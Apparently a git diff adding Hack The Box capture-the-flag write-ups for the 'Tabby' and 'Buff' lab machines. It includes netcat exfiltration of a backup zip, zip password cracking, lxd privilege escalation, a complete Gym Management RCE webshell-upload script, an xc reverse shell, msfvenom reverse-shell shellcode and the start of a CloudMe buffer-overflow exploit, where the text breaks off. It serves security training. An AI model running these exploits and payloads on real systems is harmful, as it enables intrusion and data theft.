+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ tomcat@tabby:/var/lib/tomcat9$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-06-02 08:01:09-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[=============================================================================================================>] 333.85K 699KB/s in 0.5s
+
+ 2021-06-02 08:01:10 (699 KB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ tomcat@tabby:/var/lib/tomcat9$ chmod +x /tmp/peas.sh
+
+ tomcat@tabby:/var/lib/tomcat9$ /tmp/peas.sh
+
+
+
+` 
+
+Let linpeas.sh run, then as you scroll down you will end up on a certain backup zip file:
+
+
+
+Coincidentally, it seems that the backup zip file is owned by the ash user, and there seems to be a copy of it in the /tmp folder, let's check if they are the same:
+
+
+ tomcat@tabby:/var/lib/tomcat9$ md5sum /var/www/html/files/16162020_backup.zip /tmp/16162020_backup.zip
+ f0a0af346ad4495cfdb01bd5173b0a52 /var/www/html/files/16162020_backup.zip
+ f0a0af346ad4495cfdb01bd5173b0a52 /tmp/16162020_backup.zip
+
+
+
+And indeed they are the same! let's open it locally and see what it contains, we can use netcat to get the zipfile from the box:
+
+
+
+ tomcat@tabby:/tmp$ md5sum 16162020_backup.zip
+ f0a0af346ad4495cfdb01bd5173b0a52 16162020_backup.zip
+
+ tomcat@tabby:/var/lib/tomcat9$ which nc
+ /usr/bin/nc
+
+ tomcat@tabby:/tmp$ cat 16162020_backup.zip | nc 10.10.14.13 9002
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → nc -lvnp 9002 > backup.zip
+ listening on [any] 9002 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.194] 57326
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → md5sum backup.zip
+ f0a0af346ad4495cfdb01bd5173b0a52 backup.zip
+
+
+
+And here we see that the 2 files hashes are identical, this means that we successfully transfered the file back onto our local machine. Let's try to unzip it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → unzip backup.zip
+ Archive: backup.zip
+ creating: var/www/html/assets/
+ [backup.zip] var/www/html/favicon.ico password:
+ password incorrect--reenter:
+ password incorrect--reenter:
+ skipping: var/www/html/favicon.ico incorrect password
+ creating: var/www/html/files/
+ [backup.zip] var/www/html/index.php password:
+
+
+
+But it's password protected, so let's try to crack it using fcrackzip:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → sudo apt install fcrackzip
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → fcrackzip -vuDp /usr/share/wordlists/rockyou.txt backup.zip
+ 'var/www/html/assets/' is not encrypted, skipping
+ found file 'var/www/html/favicon.ico', (size cp/uc 338/ 766, flags 9, chk 7db5)
+ 'var/www/html/files/' is not encrypted, skipping
+ found file 'var/www/html/index.php', (size cp/uc 3255/ 14793, flags 9, chk 5935)
+ found file 'var/www/html/logo.png', (size cp/uc 2906/ 2894, flags 9, chk 5d46)
+ found file 'var/www/html/news.php', (size cp/uc 114/ 123, flags 9, chk 5a7a)
+ found file 'var/www/html/Readme.txt', (size cp/uc 805/ 1574, flags 9, chk 6a8b)
+ checking pw arizon1
+
+ PASSWORD FOUND!!!!: pw == admin@it
+
+
+
+And we found the password! so let's unzip it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → unzip backup.zip
+ Archive: backup.zip
+ [backup.zip] var/www/html/favicon.ico password:
+ inflating: var/www/html/favicon.ico
+ inflating: var/www/html/index.php
+ extracting: var/www/html/logo.png
+ inflating: var/www/html/news.php
+ inflating: var/www/html/Readme.txt
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → tree var
+ var
+ └── www
+ └── html
+ ├── assets
+ ├── favicon.ico
+ ├── files
+ ├── index.php
+ ├── logo.png
+ ├── news.php
+ └── Readme.txt
+
+ 4 directories, 5 files
+
+
+
+The files that were contained are preety much irrelevant, the fact of the matter is that this zip file is supposed to be owned by ash, and we got his potential password. Let's try and see if ash re-used the same password on the box:
+
+
+ tomcat@tabby:/tmp$ su ash
+ Password:
+ ash@tabby:/tmp$ id
+ uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
+ ash@tabby:/tmp$ cat ~/user.txt
+ 04XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the ash user, and got the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc we can run linpeas once again:
+
+
+ ash@tabby:/tmp$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas2.sh
+ --2021-06-02 08:19:11-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas2.sh’
+
+ /tmp/peas2.sh 100%[=============================================================================================================>] 333.85K 689KB/s in 0.5s
+
+ 2021-06-02 08:19:12 (689 KB/s) - ‘/tmp/peas2.sh’ saved [341863/341863]
+
+ ash@tabby:/tmp$ chmod +x /tmp/peas2.sh
+ ash@tabby:/tmp$ /tmp/peas2.sh
+
+
+
+The difference being that now linpeas is going to try and find the possible paths from the ash user:
+
+
+
+Now here we see that the ash user is part of the lxd group, which can be exploited to get a root shell thanks to a lxd-alpine container:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → git clone https://github.com/saghul/lxd-alpine-builder.git
+ Cloning into 'lxd-alpine-builder'...
+ remote: Enumerating objects: 35, done.
+ remote: Counting objects: 100% (8/8), done.
+ remote: Compressing objects: 100% (8/8), done.
+ remote: Total 35 (delta 2), reused 2 (delta 0), pack-reused 27
+ Receiving objects: 100% (35/35), 21.69 KiB | 1.20 MiB/s, done.
+ Resolving deltas: 100% (8/8), done.
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → cd lxd-alpine-builder
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Tabby/lxd-alpine-builder]
+ → sudo ./build-alpine
+
+ [...]
+
+ Executing busybox-initscripts-3.2-r2.post-install
+ (16/20) Installing scanelf (1.2.8-r0)
+ (17/20) Installing musl-utils (1.2.2-r0)
+ (18/20) Installing libc-utils (0.7.2-r3)
+ (19/20) Installing alpine-keys (2.2-r0)
+ (20/20) Installing alpine-base (3.13.5-r0)
+ Executing busybox-1.32.1-r6.trigger
+ OK: 9 MiB in 20 packages
+
+
+
+Now let's transfer the built tar.gz image onto the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Tabby/lxd-alpine-builder]
+ → ls -lash alpine-v3.13-x86_64-20210602_1002.tar.gz
+ 3.2M -rw-r--r-- 1 root root 3.2M Jun 2 10:02 alpine-v3.13-x86_64-20210602_1002.tar.gz
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Tabby/lxd-alpine-builder]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ ash@tabby:/tmp$ wget http://10.10.14.13:9090/alpine-v3.13-x86_64-20210602_1002.tar.gz
+ --2021-06-02 08:24:46-- http://10.10.14.13:9090/alpine-v3.13-x86_64-20210602_1002.tar.gz
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 3256211 (3.1M) [application/gzip]
+ Saving to: ‘alpine-v3.13-x86_64-20210602_1002.tar.gz’
+
+ alpine-v3.13-x86_64-20210602_1002.tar.gz 100%[=============================================================================================================>] 3.10M 570KB/s in 5.5s
+
+ 2021-06-02 08:24:51 (582 KB/s) - ‘alpine-v3.13-x86_64-20210602_1002.tar.gz’ saved [3256211/3256211]
+
+
+
+Say no to all prompts:
+
+
+ ash@tabby:/tmp$ lxd init
+ Would you like to use LXD clustering? (yes/no) [default=no]: no
+ Do you want to configure a new storage pool? (yes/no) [default=yes]: no
+ Would you like to connect to a MAAS server? (yes/no) [default=no]: no
+ Would you like to create a new local network bridge? (yes/no) [default=yes]: no
+ Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]: no
+ Would you like LXD to be available over the network? (yes/no) [default=no]: no
+ Would you like stale cached images to be updated automatically? (yes/no) [default=yes] no
+ Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: no
+
+ ash@tabby:/tmp$ mv alpine-v3.13-x86_64-20210602_1002.tar.gz alpine.tar.gz
+ ash@tabby:/tmp$ lxc image import /tmp/alpine.tar.gz --alias alpine
+
+ ash@tabby:/tmp$ lxc image list
+ +--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+ +--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
+ | alpine | 2d59dc1f8e1c | no | Alpinelinux 3.8 x86_64 (20210601_2225) | x86_64 | CONTAINER | 1.92MB | Jun 1, 2021 at 10:54pm (UTC) |
+ +--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
+
+
+
+And once your alpine image got imported, we can launch it to get access to the root files on the server:
+
+
+ ash@tabby:/tmp$ lxc init alpine mycontainer -c security.privileged=true
+ Creating mycontainer
+
+ The instance you are starting doesn't have any network attached to it.
+ To create a new network, use: lxc network create
+ To attach a network to an instance, use: lxc network attach
+
+ ash@tabby:/tmp$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
+ Device mydevice added to mycontainer
+ ash@tabby:/tmp$ lxc start mycontainer
+ ash@tabby:/tmp$ lxc exec mycontainer /bin/sh
+
+ ~ # id
+ uid=0(root) gid=0(root)
+
+ ~ # cat /mnt/root/root/root.txt
+ 99XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/49.md b/Easy/49.md
new file mode 100644
index 0000000..fa28d68
--- /dev/null
+++ b/Easy/49.md
@@ -0,0 +1,478 @@
+# Buff Writeup
+
+
+
+## Introduction :
+
+Buff is an easy Windows box released back in July 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Buff]
+ → nmap -vvv -p- 10.10.10.198 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 8080/tcp on 10.10.10.198
+ Discovered open port 7680/tcp on 10.10.10.198
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Buff]
+ → nmap -sCV -p8080,7680 10.10.10.198 -Pn
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-02 11:19 CEST
+ Nmap scan report for 10.10.10.198
+ Host is up (0.14s latency).
+
+ PORT STATE SERVICE VERSION
+ 7680/tcp open pando-pub?
+ 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
+ |_http-open-proxy: Proxy might be redirecting requests
+ |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
+ |_http-title: mrb3n's Bro Hut
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 66.01 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 8080 running apache from Windows, so let's check it out:
+
+
+
+And upon clicking the contact page, we see that we have a Gym Management Software v1.0 instance, so let's see if there are any exploits for us to use:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Buff]
+ → searchsploit gym management
+ --------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ --------------------------------------------------------- ---------------------------------
+ Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
+ Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
+ Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
+ Gym Management System 1.0 - Unauthenticated Remote Code | php/webapps/48506.py
+ --------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+
+Let's use the Unauthenticated RCE python exploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Buff]
+ → cp $(locate 48506.py ) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Buff]
+ → cat 48506.py
+
+ import requests, sys, urllib, re
+ from colorama import Fore, Back, Style
+ requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+ def webshell(SERVER_URL, session):
+ try:
+ WEB_SHELL = SERVER_URL+'upload/kamehameha.php'
+ getdir = {'telepathy': 'echo %CD%'}
+ r2 = session.get(WEB_SHELL, params=getdir, verify=False)
+ status = r2.status_code
+ if status != 200:
+ print Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL
+ r2.raise_for_status()
+ print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
+ cwd = re.findall('[CDEF].*', r2.text)
+ cwd = cwd[0]+"> "
+ term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+ while True:
+ thought = raw_input(term)
+ command = {'telepathy': thought}
+ r2 = requests.get(WEB_SHELL, params=command, verify=False)
+ status = r2.status_code
+ if status != 200:
+ r2.raise_for_status()
+ response2 = r2.text
+ print(response2)
+ except:
+ print("\r\nExiting.")
+ sys.exit(-1)
+
+ def formatHelp(STRING):
+ return Style.BRIGHT+Fore.RED+STRING+Fore.RESET
+
+ def header():
+ BL = Style.BRIGHT+Fore.GREEN
+ RS = Style.RESET_ALL
+ FR = Fore.RESET
+ SIG = BL+' /\\\n'+RS
+ SIG += Fore.YELLOW+'/vvvvvvvvvvvv '+BL+'\\'+FR+'--------------------------------------,\n'
+ SIG += Fore.YELLOW+'`^^^^^^^^^^^^'+BL+' /'+FR+'============'+Fore.RED+'BOKU'+FR+'====================="\n'
+ SIG += BL+' \/'+RS+'\n'
+ return SIG
+
+ if __name__ == "__main__":
+ print header();
+ if len(sys.argv) != 2:
+ print formatHelp("(+) Usage:\t python %s " % sys.argv[0])
+ print formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/gym/'" % sys.argv[0])
+ sys.exit(-1)
+ SERVER_URL = sys.argv[1]
+ UPLOAD_DIR = 'upload.php?id=kamehameha'
+ UPLOAD_URL = SERVER_URL + UPLOAD_DIR
+ s = requests.Session()
+ s.get(SERVER_URL, verify=False)
+ PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a'
+ png = {
+ 'file':
+ (
+ 'kaio-ken.php.png',
+ PNG_magicBytes+'\n'+'<****?php echo shell_exec($_GET["telepathy"]); ?>',
+ 'image/png',
+ {'Content-Disposition': 'form-data'}
+ )
+ }
+ fdata = {'pupload': 'upload'}
+ r1 = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)
+ webshell(SERVER_URL, s)%
+
+Preety trivial to use, we simply need to give it the URL of the website as an arguement:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Buff]
+ → python 48506.py http://10.10.10.198:8080/
+ /\
+ /vvvvvvvvvvvv \--------------------------------------,
+ `^^^^^^^^^^^^ /============BOKU=====================
+ \/
+
+ [+] Successfully connected to webshell.
+ C:\xampp\htdocs\gym\upload> whoami
+ �PNG
+
+ buff\shaun
+
+ C:\xampp\htdocs\gym\upload> type C:\users\shaun\desktop\user.txt
+ �PNG
+
+ b0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we got the user flag!
+
+## **Part 3 : Getting Root Access**
+
+
+ C:\xampp\htdocs\gym\upload> netstat -ano | findstr LISTENING
+ �PNG
+
+ TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 956
+ TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
+ TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5780
+ TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 8608
+ TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 4080
+ TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 520
+ TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1060
+ TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1532
+ TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2232
+ TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 664
+ TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 684
+ TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
+ TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 5496
+ TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5364
+ TCP [::]:135 [::]:0 LISTENING 956
+ TCP [::]:445 [::]:0 LISTENING 4
+ TCP [::]:7680 [::]:0 LISTENING 8608
+ TCP [::]:8080 [::]:0 LISTENING 4080
+ TCP [::]:49664 [::]:0 LISTENING 520
+ TCP [::]:49665 [::]:0 LISTENING 1060
+ TCP [::]:49666 [::]:0 LISTENING 1532
+ TCP [::]:49667 [::]:0 LISTENING 2232
+ TCP [::]:49668 [::]:0 LISTENING 664
+ TCP [::]:49669 [::]:0 LISTENING 684
+
+
+
+Here we see that there's a MySQL instance running on port 3306 and something else on port 8888. This was a hint to a CloudMe Sync service [exploit](https://www.exploit-db.com/exploits/44470):
+
+Basically the CloudMe Sync software isn't compiled with any protections enabled like ASLR / DEP and is thus vulnerable to buffer overflow attacks, Although we need to access the port and for now it's still only accessible from the host machine's localhost, So we can make use of a tool named [xc](../Tools/xc/index.md) to port forward the vulnerable port 8888 we need:
+
+Now in order to privesc the box we need to look at the opened ports:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Buff]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Buff]
+ → sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support .
+ [sudo] password for nothing:
+ Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation
+
+ usage: smbserver.py [-h] [-comment COMMENT] [-username USERNAME] [-password PASSWORD] [-hashes LMHASH:NTHASH] [-ts] [-debug] [-ip INTERFACE_ADDRESS] [-port PORT] [-smb2support] shareName sharePath
+ smbserver.py: error: the following arguments are required: sharePath
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Buff]
+ → sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support test .
+ Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation
+
+ [*] Config file parsed
+ [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
+ [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
+ [*] Config file parsed
+ [*] Config file parsed
+ [*] Config file parsed
+
+ **[*] Incoming connection (10.10.10.198,49758)**
+ [*] AUTHENTICATE_MESSAGE (BUFF\shaun,BUFF)
+ [*] User BUFF\shaun authenticated successfully
+ [*] shaun::BUFF:aaaaaaaaaaaaaaaa:5d8852bb8433b59137009bf40b34891a:0101000000000000007dcc199e57d701d4e99eb4a5f42e7700000000010010005a00530056006d005a00760055006d00030010005a00530056006d005a00760055006d00020010007400660062005a004100750042006100040010007400660062005a00410075004200610007000800007dcc199e57d701060004000200000008003000300000000000000000000000002000009b16b72cf619545bf4c9fc0e0e2180a61bf08182e18b155b2f091defe359fc140a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310033000000000000000000
+ [*] Connecting Share(1:IPC$)
+ [*] Connecting Share(2:test)
+
+ C:\xampp\htdocs\gym\upload> copy \\10.10.14.13\test\xc.exe xc.exe
+ �PNG
+
+ 1 file(s) copied.
+
+
+Now let's get a reverse xc shell connection:
+
+
+ C:\xampp\htdocs\gym\upload> xc.exe 10.10.14.13 9005
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/75 ] [~/HTB/Buff]
+ → ./xc -l -p 9005
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 15:16:06 Listening on :9005
+ 2021/06/02 15:16:06 Waiting for connections...
+ 2021/06/02 15:18:28 Connection from 10.10.10.198:49764
+ 2021/06/02 15:18:28 Stream established
+
+ [*] Auto-Plugins:
+ [xc: C:\xampp\htdocs\gym\upload]: !lfwd
+ Usage: !lfwd <****localport>****remoteaddr> <****remoteport> (opens local port)
+
+ [xc: C:\xampp\htdocs\gym\upload]: !lfwd 8888 127.0.0.1 8888
+ [xc: C:\xampp\htdocs\gym\upload]: !lfwd 3306 127.0.0.1 3306
+
+ [xc: C:\xampp\htdocs\gym\upload]: !lsfwd
+ Active Port Forwarding:
+ [0] Listening on 10.10.14.13:8888, Traffic redirect to 10.10.10.198 (127.0.0.1:8888)
+ [1] Listening on 10.10.14.13:3306, Traffic redirect to 10.10.10.198 (127.0.0.1:3306)
+
+Here we port forward the port 8888 and 3306 to be accessible from our machine so let's try to login onto mysql:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/76 ] [~/HTB/Buff]
+ → ss -lnpt
+ State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
+ LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
+ LISTEN 0 5 127.0.0.1:6600 0.0.0.0:* users:(("mpd",pid=163090,fd=10))
+ LISTEN 0 128 [::]:22 [::]:*
+ LISTEN 0 4096 *:8888 *:* users:(("xc",pid=4058130,fd=8))
+ LISTEN 0 50 [::ffff:127.0.0.1]:4701 *:* users:(("java",pid=52048,fd=25))
+ LISTEN 0 4096 *:3306 *:* users:(("xc",pid=4058130,fd=9))
+ LISTEN 0 4096 *:9005 *:* users:(("xc",pid=4058130,fd=3))
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/76 ] [~/HTB/Buff]
+ → nmap -sCV -p 8888,3306 127.0.0.1
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-02 16:25 CEST
+ Nmap scan report for localhost (127.0.0.1)
+ Host is up (0.000059s latency).
+
+ PORT STATE SERVICE VERSION
+ 3306/tcp open tcpwrapped
+ | mysql-info:
+ | Protocol: 10
+ | Version: 5.5.5-10.4.11-MariaDB
+ | Thread ID: 58
+ | Capabilities flags: 63486
+ | Some Capabilities: Support41Auth, DontAllowDatabaseTableColumn, FoundRows, InteractiveClient, ConnectWithDatabase, Speaks41ProtocolNew, Speaks41ProtocolOld, SupportsTransactions, ODBCClient, LongColumnFlag, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
+ | Status: Autocommit
+ | Salt: sq^cT[LKs$RT01C?ScuF
+ |_ Auth Plugin Name: mysql_native_password
+ |_ssl-date: ERROR: Script execution failed (use -d to debug)
+ |_tls-alpn: ERROR: Script execution failed (use -d to debug)
+ 8888/tcp open mysql MySQL 5.5.5-10.4.11-MariaDB
+ |_mysql-info: ERROR: Script execution failed (use -d to debug)
+ |_ssl-date: ERROR: Script execution failed (use -d to debug)
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 21.24 seconds
+
+ [ 10.10.14.13/23 ] [ /dev/pts/81 ] [~]
+ → mysql -u root -p -h 127.0.0.1
+ Enter password:
+ Welcome to the MariaDB monitor. Commands end with ; or \g.
+ Your MariaDB connection id is 54
+ Server version: 10.4.11-MariaDB mariadb.org binary distribution
+
+ Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
+
+ Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+ MariaDB [(none)]>
+
+
+
+And here we see that we have been able to get onto mysql as the root user without any password!
+
+Now that's done, we can generate the payload we want to put into our modified [exploit](https://www.exploit-db.com/exploits/48389) using msfvenom, going from the previous payload **msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python** to the following:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/78 ] [~/HTB/Buff]
+ → **msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload**
+ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
+ Found 11 compatible encoders
+ Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
+ x86/shikata_ga_nai succeeded with size 351 (iteration=0)
+ x86/shikata_ga_nai chosen with final size 351
+ Payload size: 351 bytes
+ Final size of python file: 1869 bytes
+ payload = b""
+ payload += b"\xba\xcc\x93\xd2\xd9\xdb\xc8\xd9\x74\x24\xf4\x58"
+ payload += b"\x2b\xc9\xb1\x52\x31\x50\x12\x03\x50\x12\x83\x0c"
+ payload += b"\x97\x30\x2c\x70\x70\x36\xcf\x88\x81\x57\x59\x6d"
+ payload += b"\xb0\x57\x3d\xe6\xe3\x67\x35\xaa\x0f\x03\x1b\x5e"
+ payload += b"\x9b\x61\xb4\x51\x2c\xcf\xe2\x5c\xad\x7c\xd6\xff"
+ payload += b"\x2d\x7f\x0b\xdf\x0c\xb0\x5e\x1e\x48\xad\x93\x72"
+ payload += b"\x01\xb9\x06\x62\x26\xf7\x9a\x09\x74\x19\x9b\xee"
+ payload += b"\xcd\x18\x8a\xa1\x46\x43\x0c\x40\x8a\xff\x05\x5a"
+ payload += b"\xcf\x3a\xdf\xd1\x3b\xb0\xde\x33\x72\x39\x4c\x7a"
+ payload += b"\xba\xc8\x8c\xbb\x7d\x33\xfb\xb5\x7d\xce\xfc\x02"
+ payload += b"\xff\x14\x88\x90\xa7\xdf\x2a\x7c\x59\x33\xac\xf7"
+ payload += b"\x55\xf8\xba\x5f\x7a\xff\x6f\xd4\x86\x74\x8e\x3a"
+ payload += b"\x0f\xce\xb5\x9e\x4b\x94\xd4\x87\x31\x7b\xe8\xd7"
+ payload += b"\x99\x24\x4c\x9c\x34\x30\xfd\xff\x50\xf5\xcc\xff"
+ payload += b"\xa0\x91\x47\x8c\x92\x3e\xfc\x1a\x9f\xb7\xda\xdd"
+ payload += b"\xe0\xed\x9b\x71\x1f\x0e\xdc\x58\xe4\x5a\x8c\xf2"
+ payload += b"\xcd\xe2\x47\x02\xf1\x36\xc7\x52\x5d\xe9\xa8\x02"
+ payload += b"\x1d\x59\x41\x48\x92\x86\x71\x73\x78\xaf\x18\x8e"
+ payload += b"\xeb\xda\xd6\x9e\xe6\xb2\xe4\x9e\xf9\xf9\x60\x78"
+ payload += b"\x93\xed\x24\xd3\x0c\x97\x6c\xaf\xad\x58\xbb\xca"
+ payload += b"\xee\xd3\x48\x2b\xa0\x13\x24\x3f\x55\xd4\x73\x1d"
+ payload += b"\xf0\xeb\xa9\x09\x9e\x7e\x36\xc9\xe9\x62\xe1\x9e"
+ payload += b"\xbe\x55\xf8\x4a\x53\xcf\x52\x68\xae\x89\x9d\x28"
+ payload += b"\x75\x6a\x23\xb1\xf8\xd6\x07\xa1\xc4\xd7\x03\x95"
+ payload += b"\x98\x81\xdd\x43\x5f\x78\xac\x3d\x09\xd7\x66\xa9"
+ payload += b"\xcc\x1b\xb9\xaf\xd0\x71\x4f\x4f\x60\x2c\x16\x70"
+ payload += b"\x4d\xb8\x9e\x09\xb3\x58\x60\xc0\x77\x68\x2b\x48"
+ payload += b"\xd1\xe1\xf2\x19\x63\x6c\x05\xf4\xa0\x89\x86\xfc"
+ payload += b"\x58\x6e\x96\x75\x5c\x2a\x10\x66\x2c\x23\xf5\x88"
+ payload += b"\x83\x44\xdc"
+
+
+
+Which gives us the following exploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/78 ] [~/HTB/Buff]
+ → cat exploit.py
+ # Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
+ # Date: 2020-04-27
+ # Exploit Author: Andy Bowden
+ # Vendor Homepage: https://www.cloudme.com/en
+ # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
+ # Version: CloudMe 1.11.2
+ # Tested on: Windows 10 x86
+
+ #Instructions:
+ # Start the CloudMe service and run the script.
+
+ import socket
+
+ target = "127.0.0.1"
+
+ padding1 = b"\x90" * 1052
+ EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
+ NOPS = b"\x90" * 30
+
+ #NOT msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
+ # msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload
+ payload = b""
